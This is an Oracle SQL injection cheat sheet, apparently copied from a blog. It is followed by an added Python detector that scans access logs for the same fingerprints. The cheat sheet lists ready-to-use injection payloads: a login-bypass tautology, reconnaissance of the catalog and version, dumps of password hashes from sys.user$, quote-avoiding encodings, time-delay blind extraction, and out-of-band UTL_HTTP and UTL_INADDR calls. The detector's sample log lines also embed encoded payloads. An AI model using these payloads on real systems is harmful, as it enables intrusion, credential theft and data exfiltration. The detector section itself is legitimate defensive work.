SQL Injection Dictionary

    Oracle

    Default Databases

    SYSTEM: available in all versions
    SYSAUX: available in all versions

    Comment Out Query

    The following can be used to comment out the rest of the query after your injection:

    -- SQL comment


    Example:

        • SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';

    Testing Version

    SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
    SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
    SELECT version FROM v$instance;

    Notes:

    • All SELECT statements in Oracle must contain a table.
    • dual is a dummy table which can be used for testing.

    Database Credentials

    SELECT username FROM all_users; Available on all versions
    SELECT name, password FROM sys.user$; Privileged, <= 10g
    SELECT name, spare4 FROM sys.user$; Privileged, <= 11g

    Database Names

    Current Database

    SELECT name FROM v$database;
    SELECT instance_name FROM v$instance;
    SELECT global_name FROM global_name;
    SELECT SYS.DATABASE_NAME FROM DUAL;

    User Databases

    SELECT DISTINCT owner FROM all_tables;

    Server Hostname

    SELECT host_name FROM v$instance; (Privileged)
    SELECT UTL_INADDR.get_host_name FROM dual;
    SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
    SELECT UTL_INADDR.get_host_address FROM dual;

    Tables and Columns

    Retrieving Tables

    SELECT table_name FROM all_tables;

    Retrieving Columns

    SELECT column_name FROM all_tab_columns;

    Find Columns from Table Name

    SELECT column_name FROM all_tab_columns WHERE table_name = 'Users';

    Find Tables from Column Name

    SELECT table_name FROM all_tab_columns WHERE column_name = 'password';

    Note: Oracle stores unquoted identifiers in upper case, so unless the table was created with quoted names the comparison values above must be 'USERS' and 'PASSWORD'.

    Retrieving Multiple Tables at once

    SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').GetClobVal(), ',') FROM all_tables;

    Avoiding the use of quotations

    Unlike other RDBMS, Oracle allows table/column names and string values to be supplied in encoded form, so no quote characters are needed.

    SELECT UTL_RAW.CAST_TO_VARCHAR2(HEXTORAW('61646D696E')) FROM dual; Hex encoding (decodes to admin).
    SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; CHR() function.

    String Concatenation

    SELECT 'a'||'d'||'mi'||'n' FROM dual;

    Conditional Statements

    SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual;

    Timing

    Time Delay

    SELECT UTL_INADDR.get_host_address('non-existent-domain.com') FROM dual;

    Heavy Time Delays

    AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));

    Privileges

    SELECT privilege FROM session_privs;
    SELECT grantee, granted_role FROM dba_role_privs; (Privileged)

    Out Of Band Channeling

    DNS Requests

    SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual;
    SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;

    Password Cracking

    A Metasploit module for JTR can be found here.
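    Defensive counterpart to the recon, out-of-band and quote-avoidance sections above, added here and not part of the original cheat sheet: a small Python detector that URL-decodes the query string of web access-log lines and flags the Oracle-specific fingerprints this page lists (v$ views, sys.user$, UTL_INADDR/UTL_HTTP calls, CHR() chains, XMLAGG, the -- terminator and the ' OR 1=1 tautology). The marker names, regexes and log lines are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Oracle-specific markers drawn from the cheat sheet above. Heuristic: tune the list
# to the application before alerting on it (e.g. "--" can appear in legitimate input).
MARKERS = {
    "oracle_version_recon": r"\bv\$(version|instance|database)\b",
    "credential_dump":      r"\bsys\.user\$",
    "catalog_enumeration":  r"\ball_(tables|tab_columns|users)\b",
    "oob_channel":          r"\butl_(http|inaddr)\.",
    "quote_avoidance":      r"\bchr\(\s*\d+\s*\)(\s*\|\|\s*chr\(\s*\d+\s*\))+",
    "xml_aggregation":      r"\bxmlagg\s*\(",
    "comment_terminator":   r"--|/\*",
}
TAUTOLOGY = r"'\s*or\s*'?\d+'?\s*=\s*'?\d+"

def normalize(value: str) -> str:
    """URL-decode up to three times (double encoding is common), lower-case, strip inline comments."""
    prev, cur = None, value
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote_plus(cur)
    return re.sub(r"/\*.*?\*/", "", cur.lower())

def classify(value: str) -> set:
    """Return the set of marker names found in one request parameter value."""
    text = normalize(value)
    hits = {name for name, pat in MARKERS.items() if re.search(pat, text)}
    if re.search(TAUTOLOGY, text):
        hits.add("tautology")
    return hits

def scan_log(lines) -> list:
    """Return [(line_no, findings)] for access-log lines whose query string is suspicious."""
    out = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST)\s+\S*\?(\S*)', line)
        if m and (findings := classify(m.group(1))):
            out.append((n, findings))
    return out

# Constructed sample access-log lines (not real traffic); line 1 is benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /login?user=admin&pw=x HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /login?user=%27%20OR%201%3D1%20--&pw= HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=1%20AND%20(SELECT%20banner%20FROM%20v%24version%20WHERE%20rownum%3D1)%20IS%20NOT%20NULL HTTP/1.1" 200 100',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=1%7C%7C(SELECT%20UTL_INADDR.get_host_address(%27x.example%27)%20FROM%20dual) HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /item?id=CHR(97)%7C%7CCHR(100)%7C%7CCHR(109) HTTP/1.1" 200 100',
]
```

Run scan_log(SAMPLE_LOG) to see which lines fire and why; feeding it a real log is a quick way to check whether the cheat-sheet queries above would be visible in your own telemetry.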

    Original URL: https://www.cnblogs.com/shengxinking/p/3854266.html